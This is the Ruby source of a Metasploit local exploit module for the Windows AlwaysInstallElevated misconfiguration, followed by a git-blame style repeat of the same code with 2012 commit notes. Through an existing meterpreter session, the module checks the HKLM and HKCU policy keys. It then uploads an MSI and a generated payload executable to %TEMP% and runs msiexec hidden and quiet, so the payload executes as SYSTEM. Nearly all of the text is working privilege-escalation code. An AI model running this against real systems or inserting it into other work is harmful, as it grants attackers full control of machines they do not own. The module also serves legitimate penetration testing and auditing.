metasploit-framework/modules/exploits/windows/local/always_install_elevated.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Exploit::Local
	Rank = AverageRanking

	include Msf::Exploit::EXE
	include Msf::Post::Windows::Registry

	def initialize(info={})
		super(update_info(info, {
			'Name'          => 'Windows AlwaysInstallElevated MSI',
			'Description'    => %q{
				This module checks the AlwaysInstallElevated registry keys which
				dictate if .MSI files should be installed with elevated privileges
				(NT AUTHORITY\SYSTEM).

				The default MSI file is data/post/exec_payload.msi with the WiX source
				file under data/post/exec_payload_source/. This MSI	simply executes
				payload.exe within the same folder.

				The MSI may not execute succesfully successive times.
				
				MSI can be rebuilt from the source using the WIX tool with the following commands:
				candle exec_payload.wxs
				light exec_payload.wixobj

				Source: external/source/exploits/exec_payload_msi/exec_payload.wxs
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Ben Campbell',
					'Parvez Anwar' # discovery
				],
			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
			'Platform'      => [ 'win' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'DefaultOptions' =>
				{
					'WfsDelay' => 10,
					'EXITFUNC' => 'thread',
				},
			'Targets'       =>
				[
					[ 'Windows', { } ],
				],
			'References'    =>
				[
					[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
					[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
					[ 'URL', 'http://wix.sourceforge.net'] ,
				],
			'DisclosureDate'=> 'Mar 18 2010',
			'DefaultTarget' => 0
		}))

		register_advanced_options([
			OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]),
		], self.class)
	end

	def check
		install_elevated = "AlwaysInstallElevated"
		installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
		hkcu = "HKEY_CURRENT_USER\\#{installer}"
		hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

		local_machine_value = registry_getvaldata(hklm,install_elevated)

		if local_machine_value.nil?
			print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
			return Msf::Exploit::CheckCode::Safe
		elsif local_machine_value == 0
			print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
			return Msf::Exploit::CheckCode::Safe
		else
			print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
			current_user_value = registry_getvaldata(hkcu,install_elevated)

			if current_user_value.nil?
				print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
				return Msf::Exploit::CheckCode::Safe
			elsif current_user_value == 0
				print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
				return Msf::Exploit::CheckCode::Safe
			else
				print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
				return Msf::Exploit::CheckCode::Vulnerable
			end
		end
	end

	def cleanup
		if @executed
			begin
				print_status("Deleting MSI...")
				session.fs.file.delete(@msi_destination)
			rescue Rex::Post::Meterpreter::RequestError => e
				print_error(e.to_s)
			end

			begin
				print_status("Deleting Payload...")
				session.fs.file.delete(@payload_destination)
			rescue Rex::Post::Meterpreter::RequestError => e
				print_error(e.to_s)
			end
		end
	end

	def exploit
		@executed = false
		if check == Msf::Exploit::CheckCode::Vulnerable
			@executed = true

			msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
			msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")

			# Upload MSI
			@msi_destination = "#{session.fs.file.expand_path("%TEMP%")}\\#{msi_filename}"
			print_status("Uploading the MSI to #{@msi_destination} ...")
			session.fs.file.upload_file(@msi_destination, msi_source)

			# Upload payload
			payload = generate_payload_exe
			@payload_destination = "#{session.fs.file.expand_path("%TEMP%")}\\payload.exe"
			print_status("Uploading the Payload to #{@payload_destination} ...")
			fd = client.fs.file.new(@payload_destination, "wb")
			fd.write(payload)
			fd.close

			# Execute MSI
			print_status("Executing MSI...")

			if datastore['LOG_FILE'].nil?
				logging = ""
			else
				logging = "/l* #{datastore['LOG_FILE']} "
			end

			cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}"
			vprint_status(cmd)
			session.sys.process.execute(cmd, nil, {'Hidden' => true})
		end
	end
end
Changed to Local Exploit 2012-11-22 10:26:23 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/windows/registry'`

			`class Metasploit3 < Msf::Exploit::Local`
			`Rank = AverageRanking`

			`include Msf::Exploit::EXE`
			`include Msf::Post::Windows::Registry`

			`def initialize(info={})`
			`super(update_info(info, {`
			`'Name' => 'Windows AlwaysInstallElevated MSI',`
			`'Description' => %q{`
			`This module checks the AlwaysInstallElevated registry keys which`
			`dictate if .MSI files should be installed with elevated privileges`
			`(NT AUTHORITY\SYSTEM).`

			`The default MSI file is data/post/exec_payload.msi with the WiX source`
			`file under data/post/exec_payload_source/. This MSI simply executes`
			`payload.exe within the same folder.`

			`The MSI may not execute succesfully successive times.`
Add build instructions and removed binary 2012-11-27 18:18:20 +00:00
			`MSI can be rebuilt from the source using the WIX tool with the following commands:`
			`candle exec_payload.wxs`
			`light exec_payload.wixobj`

			`Source: external/source/exploits/exec_payload_msi/exec_payload.wxs`
Changed to Local Exploit 2012-11-22 10:26:23 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Ben Campbell',`
			`'Parvez Anwar' # discovery`
			`],`
			`'Arch' => [ ARCH_X86, ARCH_X86_64 ],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'DefaultOptions' =>`
			`{`
			`'WfsDelay' => 10,`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows', { } ],`
			`],`
			`'References' =>`
			`[`
			`[ 'URL', 'http://www.greyhathacker.net/?p=185' ],`
			`[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],`
			`[ 'URL', 'http://wix.sourceforge.net'] ,`
			`],`
			`'DisclosureDate'=> 'Mar 18 2010',`
			`'DefaultTarget' => 0`
			`}))`

			`register_advanced_options([`
			`OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]),`
			`], self.class)`
			`end`
Cleanup s 2012-11-22 10:34:05 +00:00
Changed to Local Exploit 2012-11-22 10:26:23 +00:00			`def check`
			`install_elevated = "AlwaysInstallElevated"`
			`installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"`
			`hkcu = "HKEY_CURRENT_USER\\#{installer}"`
			`hklm = "HKEY_LOCAL_MACHINE\\#{installer}"`

			`local_machine_value = registry_getvaldata(hklm,install_elevated)`

			`if local_machine_value.nil?`
			`print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")`
			`return Msf::Exploit::CheckCode::Safe`
			`elsif local_machine_value == 0`
			`print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")`
			`return Msf::Exploit::CheckCode::Safe`
			`else`
			`print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")`
			`current_user_value = registry_getvaldata(hkcu,install_elevated)`

			`if current_user_value.nil?`
			`print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")`
			`return Msf::Exploit::CheckCode::Safe`
			`elsif current_user_value == 0`
			`print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")`
			`return Msf::Exploit::CheckCode::Safe`
			`else`
			`print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")`
			`return Msf::Exploit::CheckCode::Vulnerable`
			`end`
			`end`
			`end`

			`def cleanup`
			`if @executed`
			`begin`
			`print_status("Deleting MSI...")`
			`session.fs.file.delete(@msi_destination)`
			`rescue Rex::Post::Meterpreter::RequestError => e`
			`print_error(e.to_s)`
			`end`

			`begin`
			`print_status("Deleting Payload...")`
			`session.fs.file.delete(@payload_destination)`
			`rescue Rex::Post::Meterpreter::RequestError => e`
			`print_error(e.to_s)`
			`end`
			`end`
			`end`

			`def exploit`
			`@executed = false`
			`if check == Msf::Exploit::CheckCode::Vulnerable`
			`@executed = true`

			`msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"`
Move MSI source and binary location 2012-11-27 18:12:49 +00:00			`msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")`
Changed to Local Exploit 2012-11-22 10:26:23 +00:00
			`# Upload MSI`
			`@msi_destination = "#{session.fs.file.expand_path("%TEMP%")}\\#{msi_filename}"`
			`print_status("Uploading the MSI to #{@msi_destination} ...")`
			`session.fs.file.upload_file(@msi_destination, msi_source)`

			`# Upload payload`
			`payload = generate_payload_exe`
			`@payload_destination = "#{session.fs.file.expand_path("%TEMP%")}\\payload.exe"`
			`print_status("Uploading the Payload to #{@payload_destination} ...")`
			`fd = client.fs.file.new(@payload_destination, "wb")`
			`fd.write(payload)`
			`fd.close`

			`# Execute MSI`
			`print_status("Executing MSI...")`

			`if datastore['LOG_FILE'].nil?`
			`logging = ""`
			`else`
			`logging = "/l* #{datastore['LOG_FILE']} "`
			`end`

			`cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}"`
			`vprint_status(cmd)`
			`session.sys.process.execute(cmd, nil, {'Hidden' => true})`
			`end`
			`end`
			`end`